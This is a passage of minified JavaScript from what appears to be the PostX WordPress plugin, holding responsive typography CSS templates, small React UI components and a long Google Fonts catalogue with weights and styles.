line-height: var(--postx_preset_heading_h4_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h5,\n                body.block-editor-iframe__body h5\n                {\n                    font-size: var(--postx_preset_heading_h5_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h5_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6,\n                html.colibri-wp-theme body.postx-page h6,\n                body.block-editor-iframe__body h6\n                {\n                    font-size: var(--postx_preset_heading_h6_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h6_typo_line_height_sm, normal) !important;\n                }\n            }\n\n            @media (max-width: ${t.breakpointXs||767}px) {\n                html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n                html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n                html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n                html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n                html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n                html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_xs, normal);\n                }\n                html.colibri-wp-theme body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_xs, normal);\n                }\n                body.block-editor-iframe__body h1,\n                body.block-editor-iframe__body h2,\n                body.block-editor-iframe__body h3,\n                body.block-editor-iframe__body h4,\n                body.block-editor-iframe__body h5,\n                body.block-editor-iframe__body h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_xs, normal);\n                }\n                html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h1,\n                body.block-editor-iframe__body h1\n                {\n                    font-size: var(--postx_preset_heading_h1_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h1_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h2,\n                body.block-editor-iframe__body h2\n                {\n                    font-size: var(--postx_preset_heading_h2_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h2_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h3,\n                body.block-editor-iframe__body h3\n                {\n                    font-size: var(--postx_preset_heading_h3_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h3_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h4,\n                body.block-editor-iframe__body h4\n                {\n                    font-size: var(--postx_preset_heading_h4_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h4_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h5,\n                body.block-editor-iframe__body h5\n                {\n                    font-size: var(--postx_preset_heading_h5_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h5_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6,\n                html.colibri-wp-theme body.postx-page h6,\n                body.block-editor-iframe__body h6\n                {\n                    font-size: var(--postx_preset_heading_h6_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h6_typo_line_height_xs, normal) !important;\n                }\n            }\n            `),t.enablePresetTypoCSS&&(e+=`\n            html body.postx-admin-page .editor-styles-wrapper, html body.postx-page,\n            html body.postx-admin-page .editor-styles-wrapper p, html body.postx-page p,\n            html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n            body.block-editor-iframe__body, body.block-editor-iframe__body p\n            { \n                font-family: var(--postx_preset_Body_and_Others_typo_font_family),var(--postx_preset_Body_and_Others_typo_font_family_type); \n                font-weight: var(--postx_preset_Body_and_Others_typo_font_weight);\n                font-style: var(--postx_preset_Body_and_Others_typo_font_style);\n                text-transform: var(--postx_preset_Body_and_Others_typo_text_transform);\n                text-decoration: var(--postx_preset_Body_and_Others_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Body_and_Others_typo_letter_spacing_lg, normal);\n                font-size: var(--postx_preset_body_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_body_typo_line_height_lg, normal) !important;\n            }\n            @media (max-width: ${t.breakpointSm||991}px) {\n                .postx-admin-page .editor-styles-wrapper, .postx-page,\n                .postx-admin-page .editor-styles-wrapper p, .postx-page p,\n                html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n                body.block-editor-iframe__body, body.block-editor-iframe__body p\n                {\n                    letter-spacing: var(--postx_preset_Body_and_Others_typo_letter_spacing_sm, normal);\n                    font-size: var(--postx_preset_body_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_body_typo_line_height_sm, normal) !important;\n                }\n            }\n            @media (max-width: ${t.breakpointXs||767}px) {\n                .postx-admin-page .editor-styles-wrapper, .postx-page,\n                .postx-admin-page .editor-styles-wrapper p, .postx-page p,\n                html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n                body.block-editor-iframe__body, body.block-editor-iframe__body p\n                {\n                    letter-spacing: var(--postx_preset_Body_and_Others_typo_letter_spacing_xs, normal);\n                    font-size: var(--postx_preset_body_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_body_typo_line_height_xs, normal) !important;\n                }\n            }\n            `),e}},i=(e,t)=>{localStorage.setItem(e,JSON.stringify(t))},l=(e,t={})=>{try{return JSON.parse(e)}catch(e){return t}}},2402:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);n(4201);const r=({searchQuery:e,setSearchQuery:t,setTemplateModule:n,changeStates:r})=>(0,a.createElement)("div",{className:"ultp-design-search-wrapper"},(0,a.createElement)("input",{type:"search",id:"ultp-design-search-form",className:"ultp-design-search-input",placeholder:"Search for...",value:e,onChange:e=>{t&&t(e.target.value),n&&n(""),r&&r("search",e.target.value)}}))},3100:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(2044);const r=(e,t,n,r)=>(0,a.Z)({url:e||null,utmKey:t||null,affiliate:n||null,hash:r||null})},4190:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);n(2158);const r=e=>{let t;const[n,r]=(0,a.useState)(!1);return(0,a.createElement)("div",{className:`ultp-tooltip-wrapper ${e.extraClass}`,onMouseEnter:()=>{t=setTimeout((()=>{r(!0)}),e.delay||400)},onMouseLeave:()=>{clearInterval(t),r(!1)}},e.children,n&&(0,a.createElement)("div",{className:`tooltip-content ${e.direction||"top"}`},e.content))}},2030:(e,t,n)=>{"use strict";n.d(t,{Z:()=>a});const a=[{n:"ABeeZee",v:[400,"400i"],f:"sans-serif"},{n:"Abel",v:[400],f:"sans-serif"},{n:"Abhaya Libre",v:[400,500,600,700,800],f:"serif"},{n:"Abril Fatface",v:[400],f:"display"},{n:"Abyssinica SIL",v:[400],f:"serif"},{n:"Aclonica",v:[400],f:"sans-serif"},{n:"Acme",v:[400],f:"sans-serif"},{n:"Actor",v:[400],f:"sans-serif"},{n:"Adamina",v:[400],f:"serif"},{n:"Advent Pro",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Aguafina Script",v:[400],f:"handwriting"},{n:"Akaya Kanadaka",v:[400],f:"display"},{n:"Akaya Telivigala",v:[400],f:"display"},{n:"Akronim",v:[400],f:"display"},{n:"Akshar",v:["300",400,500,600,700],f:"sans-serif"},{n:"Aladin",v:[400],f:"handwriting"},{n:"Alata",v:[400],f:"sans-serif"},{n:"Alatsi",v:[400],f:"sans-serif"},{n:"Albert Sans",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Aldrich",v:[400],f:"sans-serif"},{n:"Alef",v:[400,700],f:"sans-serif"},{n:"Alexandria",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Alegreya",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Alegreya SC",v:[400,"400i",500,"500i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Alegreya Sans",v:["100","100i","300","300i",400,"400i",500,"500i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Alegreya Sans SC",v:["100","100i","300","300i",400,"400i",500,"500i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Aleo",v:["300","300i",400,"400i",700,"700i"],f:"serif"},{n:"Alex Brush",v:[400],f:"handwriting"},{n:"Alfa Slab One",v:[400],f:"display"},{n:"Alice",v:[400],f:"serif"},{n:"Alike",v:[400],f:"serif"},{n:"Alike Angular",v:[400],f:"serif"},{n:"Allan",v:[400,700],f:"display"},{n:"Allerta",v:[400],f:"sans-serif"},{n:"Allerta Stencil",v:[400],f:"sans-serif"},{n:"Allison",v:[400],f:"handwriting"},{n:"Allura",v:[400],f:"handwriting"},{n:"Almarai",v:["300",400,700,800],f:"sans-serif"},{n:"Almendra",v:[400,"400i",700,"700i"],f:"serif"},{n:"Almendra Display",v:[400],f:"display"},{n:"Almendra SC",v:[400],f:"serif"},{n:"Alumni Sans",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Alumni Sans Inline One",v:[400,"400i"],f:"display"},{n:"Amarante",v:[400],f:"display"},{n:"Amaranth",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Amatic SC",v:[400,700],f:"handwriting"},{n:"Amethysta",v:[400],f:"serif"},{n:"Amiko",v:[400,600,700],f:"sans-serif"},{n:"Amiri",v:[400,"400i",700,"700i"],f:"serif"},{n:"Amita",v:[400,700],f:"handwriting"},{n:"Anaheim",v:[400],f:"sans-serif"},{n:"Andada Pro",v:[400,500,600,700,800,"400i","500i","600i","700i","800i"],f:"serif"},{n:"Andika",v:[400],f:"sans-serif"},{n:"Anek Bangla",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Devanagari",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Gujarati",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Gurmukhi",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Kannada",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Latin",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Malayalam",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Odia",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Tamil",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Telugu",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Angkor",v:[400],f:"display"},{n:"Annie Use Your Telescope",v:[400],f:"handwriting"},{n:"Anonymous Pro",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Antic",v:[400],f:"sans-serif"},{n:"Antic Didone",v:[400],f:"serif"},{n:"Antic Slab",v:[400],f:"serif"},{n:"Anton",v:[400],f:"sans-serif"},{n:"Antonio",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"Anybody",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"Arapey",v:[400,"400i"],f:"serif"},{n:"Arbutus",v:[400],f:"display"},{n:"Arbutus Slab",v:[400],f:"serif"},{n:"Architects Daughter",v:[400],f:"handwriting"},{n:"Archivo",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Archivo Black",v:[400],f:"sans-serif"},{n:"Archivo Narrow",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Are You Serious",v:[400],f:"handwriting"},{n:"Aref Ruqaa",v:[400,700],f:"serif"},{n:"Arimo",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Arizonia",v:[400],f:"handwriting"},{n:"Armata",v:[400],f:"sans-serif"},{n:"Arsenal",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Artifika",v:[400],f:"serif"},{n:"Arvo",v:[400,"400i",700,"700i"],f:"serif"},{n:"Arya",v:[400,700],f:"sans-serif"},{n:"Asap",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Asap Condensed",v:[200,"200i",300,"300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Asar",v:[400],f:"serif"},{n:"Asset",v:[400],f:"display"},{n:"Assistant",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Astloch",v:[400,700],f:"display"},{n:"Asul",v:[400,700],f:"sans-serif"},{n:"Athiti",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Atkinson Hyperlegible",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Atma",v:["300",400,500,600,700],f:"display"},{n:"Atomic Age",v:[400],f:"display"},{n:"Aubrey",v:[400],f:"display"},{n:"Audiowide",v:[400],f:"display"},{n:"Autour One",v:[400],f:"display"},{n:"Average",v:[400],f:"serif"},{n:"Average Sans",v:[400],f:"sans-serif"},{n:"Averia Gruesa Libre",v:[400],f:"display"},{n:"Averia Libre",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Averia Sans Libre",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Averia Serif Libre",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Azeret Mono",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"monospace"},{n:"Aboreto",v:[400],f:"display"},{n:"Abyssinica SIL",v:[400],f:"serif"},{n:"Albert Sans",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Alexandria",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Alkalami",v:[400],f:"serif"},{n:"Alkatra",v:[400,500,600,700],f:"display"},{n:"Alumni Sans Collegiate One",v:[400,"400i"],f:"sans-serif"},{n:"Alumni Sans Pinstripe",v:[400,"400i"],f:"sans-serif"},{n:"Amiri Quran",v:[400],f:"serif"},{n:"Anuphan",v:[100,200,300,400,500,600,700],f:"sans-serif"},{n:"Aoboshi One",v:[400],f:"serif"},{n:"Aref Ruqaa Ink",v:[400,700],f:"serif"},{n:"Arima",v:[100,200,300,400,500,600,700],f:"display"},{n:"B612",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"B612 Mono",v:[400,"400i",700,"700i"],f:"monospace"},{n:"BIZ UDGothic",v:[400,700],f:"sans-serif"},{n:"BIZ UDMincho",v:[400,700],f:"serif"},{n:"BIZ UDPGothic",v:[400,700],f:"sans-serif"},{n:"BIZ UDPMincho",v:[400,700],f:"serif"},{n:"Babylonica",v:[400],f:"handwriting"},{n:"Bad Script",v:[400],f:"handwriting"},{n:"Bahiana",v:[400],f:"display"},{n:"Bahianita",v:[400],f:"display"},{n:"Bai Jamjuree",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Bakbak One",v:[400],f:"display"},{n:"Ballet",v:[400],f:"handwriting"},{n:"Baloo 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Bhai 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Bhaijaan 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Bhaina 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Chettan 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Da 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Paaji 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Tamma 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Tammudu 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Thambi 2",v:[400,500,600,700,800],f:"display"},{n:"Balsamiq Sans",v:[400,"400i",700,"700i"],f:"display"},{n:"Balthazar",v:[400],f:"serif"},{n:"Bangers",v:[400],f:"display"},{n:"Barlow",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Barlow Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Barlow Semi Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Barriecito",v:[400],f:"display"},{n:"Barrio",v:[400],f:"display"},{n:"Basic",v:[400],f:"sans-serif"},{n:"Baskervville",v:[400,"400i"],f:"serif"},{n:"Battambang",v:["100","300",400,700,900],f:"display"},{n:"Baumans",v:[400],f:"display"},{n:"Bayon",v:[400],f:"sans-serif"},{n:"Be Vietnam Pro",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Beau Rivage",v:[400],f:"handwriting"},{n:"Bebas Neue",v:[400],f:"sans-serif"},{n:"Belgrano",v:[400],f:"serif"},{n:"Bellefair",v:[400],f:"serif"},{n:"Belleza",v:[400],f:"sans-serif"},{n:"Bellota",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Bellota Text",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"BenchNine",v:["300",400,700],f:"sans-serif"},{n:"Benne",v:[400],f:"serif"},{n:"Bentham",v:[400],f:"serif"},{n:"Berkshire Swash",v:[400],f:"handwriting"},{n:"Besley",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Beth Ellen",v:[400],f:"handwriting"},{n:"Bevan",v:[400,"400i"],f:"display"},{n:"BhuTuka Expanded One",v:[400],f:"display"},{n:"Big Shoulders Display",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Inline Display",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Inline Text",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Stencil Display",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Stencil Text",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Text",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Bigelow Rules",v:[400],f:"display"},{n:"Bigshot One",v:[400],f:"display"},{n:"Bilbo",v:[400],f:"handwriting"},{n:"Bilbo Swash Caps",v:[400],f:"handwriting"},{n:"BioRhyme",v:["200","300",400,700,800],f:"serif"},{n:"BioRhyme Expanded",v:["200","300",400,700,800],f:"serif"},{n:"Birthstone",v:[400],f:"handwriting"},{n:"Birthstone Bounce",v:[400,500],f:"handwriting"},{n:"Biryani",v:["200","300",400,600,700,800,900],f:"sans-serif"},{n:"Bitter",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Black And White Picture",v:[400],f:"sans-serif"},{n:"Black Han Sans",v:[400],f:"sans-serif"},{n:"Black Ops One",v:[400],f:"display"},{n:"Blinker",v:["100","200","300",400,600,700,800,900],f:"sans-serif"},{n:"Bodoni Moda",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Bokor",v:[400],f:"display"},{n:"Bona Nova",v:[400,"400i",700],f:"serif"},{n:"Bonbon",v:[400],f:"handwriting"},{n:"Bonheur Royale",v:[400],f:"handwriting"},{n:"Boogaloo",v:[400],f:"display"},{n:"Bowlby One",v:[400],f:"display"},{n:"Bowlby One SC",v:[400],f:"display"},{n:"Brawler",v:[400,700],f:"serif"},{n:"Bree Serif",v:[400],f:"serif"},{n:"Brygada 1918",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Bubblegum Sans",v:[400],f:"display"},{n:"Bubbler One",v:[400],f:"sans-serif"},{n:"Buda",v:["300"],f:"display"},{n:"Buenard",v:[400,700],f:"serif"},{n:"Bungee",v:[400],f:"display"},{n:"Bungee Hairline",v:[400],f:"display"},{n:"Bungee Inline",v:[400],f:"display"},{n:"Bungee Outline",v:[400],f:"display"},{n:"Bungee Shade",v:[400],f:"display"},{n:"Butcherman",v:[400],f:"display"},{n:"Butterfly Kids",v:[400],f:"handwriting"},{n:"Blaka",v:[400],f:"display"},{n:"Blaka Hollow",v:[400],f:"display"},{n:"Blaka Ink",v:[400],f:"display"},{n:"Braah One",v:[400],f:"sans-serif"},{n:"Bruno Ace",v:[400],f:"display"},{n:"Bruno Ace SC",v:[400],f:"display"},{n:"Bungee Spice",v:[400],f:"display"},{n:"Bungee Spice",v:[400],f:"display"},{n:"Cabin",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Cabin Condensed",v:[400,500,600,700],f:"sans-serif"},{n:"Cabin Sketch",v:[400,700],f:"display"},{n:"Caesar Dressing",v:[400],f:"display"},{n:"Cagliostro",v:[400],f:"sans-serif"},{n:"Cairo",v:["200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Caladea",v:[400,"400i",700,"700i"],f:"serif"},{n:"Calistoga",v:[400],f:"display"},{n:"Calligraffitti",v:[400],f:"handwriting"},{n:"Cambay",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Cambo",v:[400],f:"serif"},{n:"Candal",v:[400],f:"sans-serif"},{n:"Cantarell",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Cantata One",v:[400],f:"serif"},{n:"Cantora One",v:[400],f:"sans-serif"},{n:"Capriola",v:[400],f:"sans-serif"},{n:"Caramel",v:[400],f:"handwriting"},{n:"Carattere",v:[400],f:"handwriting"},{n:"Cardo",v:[400,"400i",700],f:"serif"},{n:"Carme",v:[400],f:"sans-serif"},{n:"Carrois Gothic",v:[400],f:"sans-serif"},{n:"Carrois Gothic SC",v:[400],f:"sans-serif"},{n:"Carter One",v:[400],f:"display"},{n:"Castoro",v:[400,"400i"],f:"serif"},{n:"Catamaran",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Caudex",v:[400,"400i",700,"700i"],f:"serif"},{n:"Caveat",v:[400,500,600,700],f:"handwriting"},{n:"Caveat Brush",v:[400],f:"handwriting"},{n:"Cedarville Cursive",v:[400],f:"handwriting"},{n:"Ceviche One",v:[400],f:"display"},{n:"Chakra Petch",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Changa",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Changa One",v:[400,"400i"],f:"display"},{n:"Chango",v:[400],f:"display"},{n:"Charm",v:[400,700],f:"handwriting"},{n:"Charmonman",v:[400,700],f:"handwriting"},{n:"Chathura",v:["100","300",400,700,800],f:"sans-serif"},{n:"Chau Philomene One",v:[400,"400i"],f:"sans-serif"},{n:"Chela One",v:[400],f:"display"},{n:"Chelsea Market",v:[400],f:"display"},{n:"Chenla",v:[400],f:"display"},{n:"Cherish",v:[400],f:"handwriting"},{n:"Cherry Cream Soda",v:[400],f:"display"},{n:"Cherry Swash",v:[400,700],f:"display"},{n:"Chewy",v:[400],f:"display"},{n:"Chicle",v:[400],f:"display"},{n:"Chilanka",v:[400],f:"handwriting"},{n:"Chivo",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Chonburi",v:[400],f:"display"},{n:"Cinzel",v:[400,500,600,700,800,900],f:"serif"},{n:"Cinzel Decorative",v:[400,700,900],f:"display"},{n:"Clicker Script",v:[400],f:"handwriting"},{n:"Coda",v:[400,800],f:"display"},{n:"Coda Caption",v:[800],f:"sans-serif"},{n:"Codystar",v:["300",400],f:"display"},{n:"Coiny",v:[400],f:"display"},{n:"Combo",v:[400],f:"display"},{n:"Comfortaa",v:["300",400,500,600,700],f:"display"},{n:"Comforter",v:[400],f:"handwriting"},{n:"Comforter Brush",v:[400],f:"handwriting"},{n:"Comic Neue",v:["300","300i",400,"400i",700,"700i"],f:"handwriting"},{n:"Coming Soon",v:[400],f:"handwriting"},{n:"Commissioner",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Concert One",v:[400],f:"display"},{n:"Condiment",v:[400],f:"handwriting"},{n:"Content",v:[400,700],f:"display"},{n:"Contrail One",v:[400],f:"display"},{n:"Convergence",v:[400],f:"sans-serif"},{n:"Cookie",v:[400],f:"handwriting"},{n:"Copse",v:[400],f:"serif"},{n:"Corben",v:[400,700],f:"display"},{n:"Corinthia",v:[400,700],f:"handwriting"},{n:"Cormorant",v:[300,400,500,600,700,"300i","400i","500i","600i","700i"],f:"serif"},{n:"Cormorant Garamond",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Cormorant Infant",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Cormorant SC",v:["300",400,500,600,700],f:"serif"},{n:"Cormorant Unicase",v:["300",400,500,600,700],f:"serif"},{n:"Cormorant Upright",v:["300",400,500,600,700],f:"serif"},{n:"Courgette",v:[400],f:"handwriting"},{n:"Courier Prime",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Cousine",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Coustard",v:[400,900],f:"serif"},{n:"Covered By Your Grace",v:[400],f:"handwriting"},{n:"Crafty Girls",v:[400],f:"handwriting"},{n:"Creepster",v:[400],f:"display"},{n:"Crete Round",v:[400,"400i"],f:"serif"},{n:"Crimson Pro",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Croissant One",v:[400],f:"display"},{n:"Crushed",v:[400],f:"display"},{n:"Cuprum",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Cute Font",v:[400],f:"display"},{n:"Cutive",v:[400],f:"serif"},{n:"Cutive Mono",v:[400],f:"monospace"},{n:"Cairo Play",v:[200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Carlito",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Castoro Titling",v:[400],f:"display"},{n:"Charis SIL",v:[400,"400i",700,"700i"],f:"serif"},{n:"Cherry Bomb One",v:[400],f:"display"},{n:"Chivo Mono",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"monospace"},{n:"Chokokutai",v:[400],f:"display"},{n:"Climate Crisis",v:[400],f:"display"},{n:"Comme",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Crimson Text",v:[400,"400i",600,"600i",700,"700i"],f:"serif"},{n:"DM Mono",v:["300","300i",400,"400i",500,"500i"],f:"monospace"},{n:"DM Sans",v:[400,"400i",500,"500i",700,"700i"],f:"sans-serif"},{n:"DM Serif Display",v:[400,"400i"],f:"serif"},{n:"DM Serif Text",v:[400,"400i"],f:"serif"},{n:"Damion",v:[400],f:"handwriting"},{n:"Dancing Script",v:[400,500,600,700],f:"handwriting"},{n:"Dangrek",v:[400],f:"display"},{n:"Darker Grotesque",v:["300",400,500,600,700,800,900],f:"sans-serif"},{n:"David Libre",v:[400,500,700],f:"serif"},{n:"Dawning of a New Day",v:[400],f:"handwriting"},{n:"Days One",v:[400],f:"sans-serif"},{n:"Dekko",v:[400],f:"handwriting"},{n:"Dela Gothic One",v:[400],f:"display"},{n:"Delius",v:[400],f:"handwriting"},{n:"Delius Swash Caps",v:[400],f:"handwriting"},{n:"Delius Unicase",v:[400,700],f:"handwriting"},{n:"Della Respira",v:[400],f:"serif"},{n:"Denk One",v:[400],f:"sans-serif"},{n:"Devonshire",v:[400],f:"handwriting"},{n:"Dhurjati",v:[400],f:"sans-serif"},{n:"Didact Gothic",v:[400],f:"sans-serif"},{n:"Diplomata",v:[400],f:"display"},{n:"Diplomata SC",v:[400],f:"display"},{n:"Do Hyeon",v:[400],f:"sans-serif"},{n:"Dokdo",v:[400],f:"handwriting"},{n:"Domine",v:[400,500,600,700],f:"serif"},{n:"Donegal One",v:[400],f:"serif"},{n:"Dongle",v:["300",400,700],f:"sans-serif"},{n:"Doppio One",v:[400],f:"sans-serif"},{n:"Dorsa",v:[400],f:"sans-serif"},{n:"Dosis",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"DotGothic16",v:[400],f:"sans-serif"},{n:"Dr Sugiyama",v:[400],f:"handwriting"},{n:"Duru Sans",v:[400],f:"sans-serif"},{n:"Dynalight",v:[400],f:"display"},{n:"Darumadrop One",v:[400],f:"display"},{n:"Delicious Handrawn",v:[400],f:"handwriting"},{n:"DynaPuff",v:[400,500,600,700],f:"display"},{n:"Edu NSW ACT Foundation",v:[400,500,600,700],f:"handwriting"},{n:"EB Garamond",v:[400,500,600,700,800,"400i","500i","600i","700i","800i"],f:"serif"},{n:"Eagle Lake",v:[400],f:"handwriting"},{n:"East Sea 